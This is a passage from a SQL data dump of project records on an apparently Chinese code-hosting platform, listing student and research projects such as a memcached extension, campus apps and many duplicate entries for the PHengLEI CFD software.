high-level constraints expressed by users.','btrp.inria.fr/sandbox-dev/',1,NULL,'2013-09-07 00:24:45','2020-08-12 09:00:18','contest',1,77,78,0,0,0,1,95,0,NULL,NULL,1,244,NULL,0,0,131275,0,'Z9PFSR',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(353,'基于社区热度开源软件排序关键技术研究','','',1,NULL,'2015-11-20 09:14:57','2020-08-12 09:03:03','ranking',1,1631,1632,0,0,0,1,19,0,NULL,NULL,NULL,267,NULL,0,0,51105,0,'4WOFY3','gQHd8TwAAAAAAAAAAS5odHRwOi8vd2VpeGluLnFxLmNvbS9xLzAyLUdCTzg5SzU5Yl8xNzZyU3hwMTEAAgTGzg5ZAwQAjScA',1496734662,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(354,'访客自主识别机器人','','',1,NULL,'2015-12-13 23:07:00','2020-08-12 09:00:40','my_robot',1,1779,1780,0,0,0,1,94,0,NULL,NULL,1,250,NULL,0,0,84411,0,'6HGX5W',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(355,'e2s','','',1,NULL,'2015-12-20 22:43:08','2020-08-12 09:00:43','final',1,1953,1954,0,0,0,1,53,0,NULL,NULL,NULL,251,NULL,0,0,25089,0,'VNJ3QY',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(356,'Codepedia2.0','Codepedia的2.0版本','',1,NULL,'2018-04-14 20:36:56','2020-08-12 09:00:48','codepedia2',1,8633,8634,0,0,0,1,16,0,NULL,NULL,NULL,4163,NULL,0,0,100274,0,'5XENAB','gQET8TwAAAAAAAAAAS5odHRwOi8vd2VpeGluLnFxLmNvbS9xLzAyeXp3Rjk5SzU5Yl8xcTFxTDFyMTEAAgSBDUhbAwQAjScA',1534040705,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(357,'teamwork','','',1,NULL,'2016-11-03 21:40:50','2020-08-12 09:01:09','guoren',1,4021,4022,0,0,0,1,109,0,NULL,NULL,NULL,255,NULL,0,0,5604,0,'3NQCA8',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(358,'小米便签第三大组代码阅读','第三大组的赶快死进来','',1,NULL,'2015-10-31 09:03:29','2020-08-12 09:01:15','xiaomi_note3',1,1523,1524,0,0,0,1,5,0,NULL,NULL,1,256,NULL,0,0,37058,0,'NRHQ29',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(359,'On The Way-公交车实时查询和路线规划APP-孔宁子、乌洪军、吴泱坤、白颜滔','无','',1,NULL,'2017-09-04 23:27:24','2020-08-12 09:01:14','master2017',1,6691,6692,0,0,0,1,30,0,NULL,NULL,NULL,3199,NULL,0,0,19895,0,'ZXTFUC',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(360,'基于语音交互的老人看护机器人系统','本项目是老人看护机器人,是一种老人看护机器人系统 基于机器视觉技术的多策略老人看护方法,该方法是一种基于天气监测的老人看护机器人系统','',1,NULL,'2018-10-10 17:03:40','2020-08-14 08:29:12','projectgit',1,10201,10202,0,0,0,1,35,0,NULL,NULL,NULL,4868,NULL,0,0,36829,0,'HB6Y89',NULL,0,NULL,0,NULL,6,32,1,NULL,0,0,0,0,'',0,0,0,0,NULL,0,0,0),(361,'电商大数据实训','','',1,NULL,'2019-01-08 14:10:15','2020-08-12 09:01:35','bigdata',1,10587,10588,0,0,0,1,56,0,NULL,NULL,NULL,259,NULL,0,0,7702,0,'TR2N4Q',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(362,'学蜂软件','致力于考勤签到和跨校社区交流','',1,NULL,'2017-03-06 07:37:03','2020-08-12 09:01:31','dandan321',1,5287,5288,0,0,1,1,41,0,NULL,NULL,NULL,260,NULL,0,0,5148,0,'GNP9US','gQGS8DwAAAAAAAAAAS5odHRwOi8vd2VpeGluLnFxLmNvbS9xLzAyLWRsMTlNSzU5Yl8xY3BBaE5wMWcAAgQZV_pYAwQAjScA',1494344729,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(363,'小米便签第三大组','第三大组的赶快死进来','',1,NULL,'2015-12-12 10:37:29','2020-08-12 09:01:31','xiaomi_note3-1',9,1771,1772,0,0,0,1,4,0,NULL,NULL,1,261,NULL,0,0,22,0,'U3R2F6',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(364,'无人值守超市管理系统 郭宁、刘洪义、蒋光军、武剑伟','本项目为软件工程等一系列课程的课程设计项目,小组的成员有:郭宁、刘洪义、蒋光军、武剑伟。','',1,NULL,'2018-10-10 16:14:03','2020-08-12 09:01:40','project',1,10195,10196,0,0,0,1,25,0,NULL,NULL,NULL,4865,NULL,0,0,8149,0,'XU3MZV','gQFO8DwAAAAAAAAAAS5odHRwOi8vd2VpeGluLnFxLmNvbS9xLzAyYXZIVzhtSzU5Yl8xZllhZXh0MUMAAgT8PedcAwQAjScA',1561250556,NULL,0,NULL,8,32,1,NULL,0,0,0,0,'',0,0,0,0,NULL,0,0,0),(365,'R-Memcached for Service4All (RMCS)','To improve the performance of Service4All, we will employ the widely-used cache tools such as memcached to it, which can lower the latency of read operations. However, applications on Service Oriented AppEngine(SAE) are massive and diverse, and the memory is volatile, therefore we design a R-Memcached to improve the efficiency and data reliability in the memcached. ','',1,NULL,'2014-07-15 11:53:45','2020-08-12 09:02:47','r-memcached',1,173,174,0,0,0,1,104,0,NULL,NULL,1,264,NULL,0,0,149796,1,'TFDRE8',NULL,0,NULL,0,NULL,8,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(366,'GitHub issue跨项目bug分类','项目内的bug分类方法,进一步是找到多种方法构建项目依赖关系网络,对某一个项目,找到相关联的项目族群,并使用项目族群的issue训练的模型对该项目issue分类,看最终得到的结果能否逼近使用项目本身的数据进行分类的准确度。 ','',1,NULL,'2017-07-17 19:09:24','2020-08-14 09:24:24','git_cross_issue',1,6501,6502,0,0,0,1,4,0,NULL,NULL,NULL,265,NULL,0,0,24652,0,'WUOLCN',NULL,0,NULL,0,NULL,1,3,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(367,'Python_Sonar','This is the Git repo of the Docker official image for python. See the Docker Hub page for the full readme on how to use this Docker image and for information regarding contributing and issues.','',1,NULL,'2016-11-09 16:12:04','2020-08-14 08:20:35','python_sonar',1,4217,4218,0,0,0,1,54,0,NULL,NULL,NULL,268,NULL,0,0,13743,0,'7M4SAH','gQG38DwAAAAAAAAAAS5odHRwOi8vd2VpeGluLnFxLmNvbS9xLzAyN3ZkXzlzSzU5Yl8xdXk5TjFvMTEAAgSiPEpYAwQAjScA',1483852194,NULL,0,NULL,2,32,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(368,'“物流小助手”','\n\n本项目是物流系统软件,可以实现跨境物流管理软件,运行高效,稳定,安全,快递物流一体化解决方案.物流系统软件,快递物流专属系统界面简洁,操作简单,功能强大,管理方便,可免费测试.\n','',1,NULL,'2017-09-04 20:15:08','2020-08-14 09:07:30','group_fighting',1,6687,6688,0,0,0,1,15,0,NULL,NULL,NULL,3197,NULL,0,0,14139,0,'W6SRFB',NULL,0,NULL,0,NULL,8,11,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(369,'find classroom','本项目为找教室,帮助用户快速寻找校园内空闲教室,并能够浏览讲座信息,查询课程信息','',1,NULL,'2016-11-08 16:17:27','2020-08-14 08:36:55','find-classroom',1,4189,4190,0,0,0,1,104,0,NULL,NULL,NULL,271,NULL,0,0,1681,0,'R65NCM',NULL,0,NULL,0,NULL,8,11,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(370,'基于知识图谱的地理信息平台','知识图谱是人工智能与虚拟地理环境知识工程相结合的桥梁。本系统结合知识图谱、地理知识图谱的研究现状,提出了地理知识图谱的构建流程,重点实现了地理知识图谱构建的关键技术,讨论和阐述了地理知识图谱的应用方向。本研究将有助于实现地理信息的知识化,提高虚拟地理环境系统的智能化服务水平。','',1,NULL,'2019-12-10 10:45:35','2020-10-16 02:04:22','geo_info_platform',1,11657,11658,0,0,0,1,46,0,NULL,NULL,NULL,272,NULL,2,0,3020,0,'SKECLB',NULL,0,NULL,0,NULL,4,11,1,1,0,0,7,4,NULL,1,0,-1,0,NULL,0,0,0),(371,'webssh','中间件中的webssh服务','',1,NULL,'2019-06-17 17:15:51','2020-08-14 08:21:29','webssh',1,10795,10796,0,0,0,1,26,0,NULL,NULL,NULL,275,NULL,0,0,3245,0,'R6NCAF',NULL,0,NULL,0,NULL,6,32,1,NULL,0,0,0,0,'',0,0,0,0,NULL,0,0,0),(374,'私有项目的测试','私有项目的测试私有项目的测试私有项目的测试','',0,NULL,'2020-08-12 10:09:09','2020-08-12 10:09:10','private_project_test',1,NULL,NULL,0,0,0,1,1,0,NULL,NULL,NULL,280,NULL,0,0,6,0,NULL,NULL,0,NULL,0,NULL,1,1,1,1,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(375,'20200813','s','',0,NULL,'2020-08-13 01:33:16','2020-08-13 01:33:16','ghyu',1,NULL,NULL,0,0,0,1,49,0,NULL,NULL,NULL,286,NULL,0,0,2,0,NULL,NULL,0,NULL,0,NULL,2,3,2,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(376,'0825版本问题','记录2020年度0825上线版本在测试过程中出现的问题等','',1,NULL,'2020-08-13 01:57:09','2021-03-11 01:39:01','issue',1,NULL,NULL,0,0,0,1,1,0,NULL,NULL,NULL,287,NULL,5,0,680,0,NULL,NULL,0,NULL,0,NULL,8,1,1,1,1,2,104,7,NULL,0,0,-2,0,NULL,0,0,0),(378,'RenameRefactor','本项目是一个Eclipse插件项目','',1,NULL,'2020-08-19 01:11:40','2020-08-19 01:13:43','refactor',1,NULL,NULL,0,0,0,1,115,0,NULL,NULL,NULL,298,NULL,1,0,46,0,NULL,NULL,0,NULL,0,NULL,1,2,1,1,0,0,0,0,NULL,0,0,-1,0,NULL,0,0,0),(379,'0825版本问题','记录0825上线版本在测试过程中出现的问题','',1,NULL,'2020-08-20 01:49:28','2020-08-20 01:49:28','issue',1,NULL,NULL,0,0,0,1,49,0,NULL,NULL,NULL,NULL,376,0,0,376,0,NULL,NULL,0,NULL,0,NULL,8,1,1,1,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(389,'MIllf','MIllf','',1,NULL,'2020-08-27 02:56:48','2020-08-27 02:56:49','MIllf_P',1,NULL,NULL,0,0,0,1,48,0,NULL,NULL,NULL,305,NULL,0,0,74,0,NULL,NULL,0,NULL,0,NULL,1,1,1,1,0,0,1,0,NULL,0,0,0,0,NULL,0,0,0),(391,'diboot','化繁为简+以简驭繁 -> 为开发人员打造的低代码开发平台。关联无SQL,前后端代码可视化生成等多种功能任您探索!','',1,NULL,'2020-08-27 03:21:38','2020-08-27 03:21:41','diboot',1,NULL,NULL,0,1,0,1,47,0,NULL,NULL,NULL,306,NULL,0,0,25,0,NULL,NULL,0,NULL,0,NULL,10,12,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(392,'amis前端框架','amis 是一个低代码前端框架,它使用 JSON 配置来生成页面,可以节省页面开发工作量,极大提升开发前端页面的效率','',1,NULL,'2020-08-27 03:25:19','2020-08-27 03:25:26','amis',1,NULL,NULL,0,1,0,1,47,0,NULL,NULL,NULL,307,NULL,1,0,33,0,NULL,NULL,0,NULL,0,NULL,10,12,1,NULL,0,0,1,0,NULL,0,0,0,0,NULL,0,0,0),(393,'Military-Server','Military for Ruby on Rails applications.','',0,NULL,'2020-08-27 03:25:52','2020-08-27 03:25:52','military-server',1,NULL,NULL,0,2,0,1,48,0,NULL,NULL,NULL,NULL,NULL,0,0,99,0,NULL,NULL,0,NULL,0,NULL,1,1,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(395,'amis前端框架','amis 是一个低代码前端框架,它使用 JSON 配置来生成页面,可以节省页面开发工作量,极大提升开发前端页面的效率','',1,NULL,'2020-09-08 05:35:44','2020-09-08 05:35:44','amis',1,NULL,NULL,0,0,0,1,115,0,NULL,NULL,NULL,NULL,392,0,0,15,0,NULL,NULL,0,NULL,0,NULL,10,12,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(396,'测试project_language_name','测试project_language_name','',1,NULL,'2020-09-11 06:57:04','2020-09-11 06:57:05','ets_project_language',1,NULL,NULL,0,0,0,1,1,0,NULL,NULL,NULL,311,NULL,0,0,419,0,NULL,NULL,0,NULL,0,NULL,4,3,2,2,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(397,'基于知识图谱的地理信息平台','知识图谱是人工智能与虚拟地理环境知识工程相结合的桥梁。本系统结合知识图谱、地理知识图谱的研究现状,提出了地理知识图谱的构建流程,重点实现了地理知识图谱构建的关键技术,讨论和阐述了地理知识图谱的应用方向。本研究将有助于实现地理信息的知识化,提高虚拟地理环境系统的智能化服务水平。','',1,NULL,'2020-10-15 00:53:52','2020-10-15 00:53:52','geo_info_platform',1,NULL,NULL,0,0,0,1,49,0,NULL,NULL,NULL,NULL,370,1,0,40,0,NULL,NULL,0,NULL,0,NULL,4,8,1,1,0,0,1,1,NULL,0,0,0,0,NULL,0,0,0),(398,'lenosp','lenos(p为spring boot 2.0 版本扩展名)一款快速开发模块化脚手架,采用spring boot 2.0.1、spring、SpringMvc、mybatis、shiro、activiti工作流、swagger、ehcache、redis、quartz、freemarker、layui技术开发;博客采用vue前后分离,持久层集成tkmapper丰富简单数据交互,支持mysql/sqlserver数据源,实现功能有系统模块:菜单管理、用户管理、角色管理,系统监控:系统日志、接口api、sql监控、可配置化定时任务,工作流程管理:流程管理(动态给节点配置角色)、模块列表(新建编辑发布流程)、请假流程、待办任务。博客模块为单独的前端后台多页面,服务为lenosp,本项目会一直维护并集成新的技术,给您的开发节约时间成本。演示地址: 收起 \nhttp://118.89.110.129:8686/','',1,NULL,'2020-10-15 01:06:01','2020-10-15 03:43:59','lenosp',1,NULL,NULL,0,1,0,1,49,0,NULL,NULL,NULL,313,NULL,0,0,29,0,NULL,NULL,0,NULL,0,NULL,10,11,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(400,'SpringbootMybatis项目实例','本项目是基于SpringBoot+Mybatis+Mysql+Html实现的页面登录案例 ','',1,NULL,'2020-10-15 01:18:08','2020-10-15 01:59:52','SpringbootMybatis',1,NULL,NULL,0,1,0,1,50,0,NULL,NULL,NULL,318,NULL,2,0,69,0,NULL,NULL,0,NULL,0,NULL,10,11,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(404,'SpringbootMybatis项目实例','本项目是基于SpringBoot+Mybatis+Mysql+Html实现的页面登录案例 ','',1,NULL,'2020-10-16 06:51:52','2020-10-16 06:51:52','SpringbootMybatis',1,NULL,NULL,0,0,0,1,46,0,NULL,NULL,NULL,NULL,400,0,0,66,0,NULL,NULL,0,NULL,0,NULL,10,11,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(430,'前端react-V0.1-特殊','前端react-V0.1-特殊前端react-V0.1-特殊前端react-V0.1-特殊前端react-V0.1-特殊前端react-V0.1-特殊','',0,NULL,'2021-01-04 02:34:21','2021-01-04 02:34:21','special',1,NULL,NULL,0,0,0,1,134,0,NULL,NULL,NULL,344,NULL,1,0,31,0,NULL,NULL,0,NULL,0,NULL,6,3,360,1,0,0,1,1,NULL,0,1,0,0,NULL,0,0,0),(447,'MIS','镜像项目','',1,NULL,'2021-01-07 01:07:03','2021-01-07 01:07:04','geo_info_platform',1,NULL,NULL,0,1,0,1,115,0,NULL,NULL,NULL,359,NULL,0,0,13,0,NULL,NULL,0,NULL,0,NULL,1,4,1,NULL,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(448,'风雷','国家数值风洞软件……','',0,NULL,'2021-01-07 01:09:22','2021-01-29 01:19:35','PHengLei',1,NULL,NULL,0,0,0,1,115,0,NULL,NULL,NULL,360,NULL,0,0,28,0,NULL,NULL,0,NULL,0,NULL,8,4,360,1,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(453,'0825版本问题','记录0825上线版本在测试过程中出现的问题等','',1,NULL,'2021-01-07 02:49:58','2021-01-07 02:49:58','issue',1,NULL,NULL,0,0,0,1,115,0,NULL,NULL,NULL,NULL,376,0,0,75,0,NULL,NULL,0,NULL,0,NULL,8,1,1,1,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(470,'qqq','qqq','',1,NULL,'2021-01-19 02:51:59','2021-01-19 02:51:59','qqq',1,NULL,NULL,0,0,0,1,129,0,NULL,NULL,NULL,NULL,NULL,NULL,0,19,0,NULL,NULL,0,NULL,0,NULL,1,1,129,117,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(472,'测试项目','测试项目','',0,NULL,'2021-01-22 07:38:53','2021-01-22 07:38:54','test',1,NULL,NULL,0,0,0,1,155,0,NULL,NULL,NULL,378,NULL,0,0,5,0,NULL,NULL,0,NULL,0,NULL,10,11,1,99,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(473,'基于知识图谱的地理信息平台','知识图谱是人工智能与虚拟地理环境知识工程相结合的桥梁。本系统结合知识图谱、地理知识图谱的研究现状,提出了地理知识图谱的构建流程,重点实现了地理知识图谱构建的关键技术,讨论和阐述了地理知识图谱的应用方向。本研究将有助于实现地理信息的知识化,提高虚拟地理环境系统的智能化服务水平。','',1,NULL,'2021-01-22 08:01:06','2021-01-22 08:01:06','geo_info_platform',1,NULL,NULL,0,0,0,1,155,0,NULL,NULL,NULL,NULL,397,0,0,57,0,NULL,NULL,0,NULL,0,NULL,4,8,1,1,0,0,3,2,NULL,2,1,0,0,NULL,0,0,0),(474,'测试项目02','测试项目02','',0,NULL,'2021-01-22 08:02:31','2021-02-20 06:11:16','test02',1,NULL,NULL,0,0,0,1,155,0,NULL,NULL,NULL,380,NULL,0,0,37,0,NULL,NULL,0,NULL,0,NULL,10,11,1,99,0,0,1,0,NULL,0,0,0,0,NULL,0,0,0),(475,'test02','test02','',0,NULL,'2021-01-22 08:41:07','2021-01-22 08:41:07','test02',1,NULL,NULL,0,0,0,1,155,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,NULL,NULL,0,NULL,0,NULL,10,11,3,99,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(476,'test04','test04','',0,NULL,'2021-01-25 06:57:37','2021-01-25 06:57:38','test04',1,NULL,NULL,0,0,0,1,155,0,NULL,NULL,NULL,381,NULL,0,0,7,0,NULL,NULL,0,NULL,0,NULL,2,1,1,1,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(477,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-01-26 01:28:44','2021-03-05 01:27:02','PHengLEI',1,NULL,NULL,0,0,0,1,156,0,NULL,NULL,NULL,382,NULL,29,0,974,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,9,3,9,5,NULL,0,0,0,0,NULL,0,0,0),(478,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-01-28 08:10:18','2021-01-28 08:10:18','PHengLEI',1,NULL,NULL,0,0,0,1,158,0,NULL,NULL,NULL,NULL,477,0,0,6,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(479,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-01-28 08:13:15','2021-01-28 08:13:15','PHengLEI',1,NULL,NULL,0,0,0,1,157,0,NULL,NULL,NULL,NULL,477,0,0,1,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(480,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-01-28 08:18:32','2021-01-28 08:18:32','PHengLEI',1,NULL,NULL,0,0,0,1,137,0,NULL,NULL,NULL,NULL,477,0,0,8,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,1,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(481,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-01-28 08:27:27','2021-01-28 08:27:27','PHengLEI',1,NULL,NULL,0,0,0,1,122,0,NULL,NULL,NULL,NULL,477,0,0,11,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(482,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-01-28 08:29:08','2021-01-28 08:29:08','PHengLEI',1,NULL,NULL,0,0,0,1,120,0,NULL,NULL,NULL,NULL,477,0,0,4,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(483,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-01-28 08:59:06','2021-01-28 08:59:06','PHengLEI',1,NULL,NULL,0,0,0,1,46,0,NULL,NULL,NULL,NULL,477,0,0,10,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(485,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-01-28 10:30:27','2021-01-28 10:30:27','PHengLEI',1,NULL,NULL,0,0,0,1,159,0,NULL,NULL,NULL,NULL,477,0,0,1,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(486,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-01-28 14:08:58','2021-01-28 14:08:58','PHengLEI',1,NULL,NULL,0,0,0,1,121,0,NULL,NULL,NULL,NULL,477,0,0,1,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(487,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-01-28 14:11:30','2021-01-28 14:11:30','PHengLEI',1,NULL,NULL,0,0,0,1,152,0,NULL,NULL,NULL,NULL,477,0,0,1,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(488,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-01-28 15:41:47','2021-01-28 15:41:48','PHengLEI',1,NULL,NULL,0,0,0,1,160,0,NULL,NULL,NULL,NULL,477,0,0,2,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(489,'国家数值风洞风雷软件','风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','',0,NULL,'2021-02-20 03:43:08','2021-02-20 03:43:08','PHengLEI',1,NULL,NULL,0,0,0,1,164,0,NULL,NULL,NULL,NULL,477,0,0,4,0,NULL,NULL,0,NULL,0,NULL,8,4,360,3,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(490,'测试项目08','测试项目08','',1,NULL,'2021-02-20 04:47:43','2021-02-20 04:47:44','test08',1,NULL,NULL,0,0,0,1,155,0,NULL,NULL,NULL,395,NULL,0,0,17,0,NULL,NULL,0,NULL,0,NULL,1,2,1,1,0,0,0,0,NULL,0,0,0,0,NULL,0,0,0),(491,'test3456','test','',0,NULL,'2021-02-22 07:38:25','2021-03-04 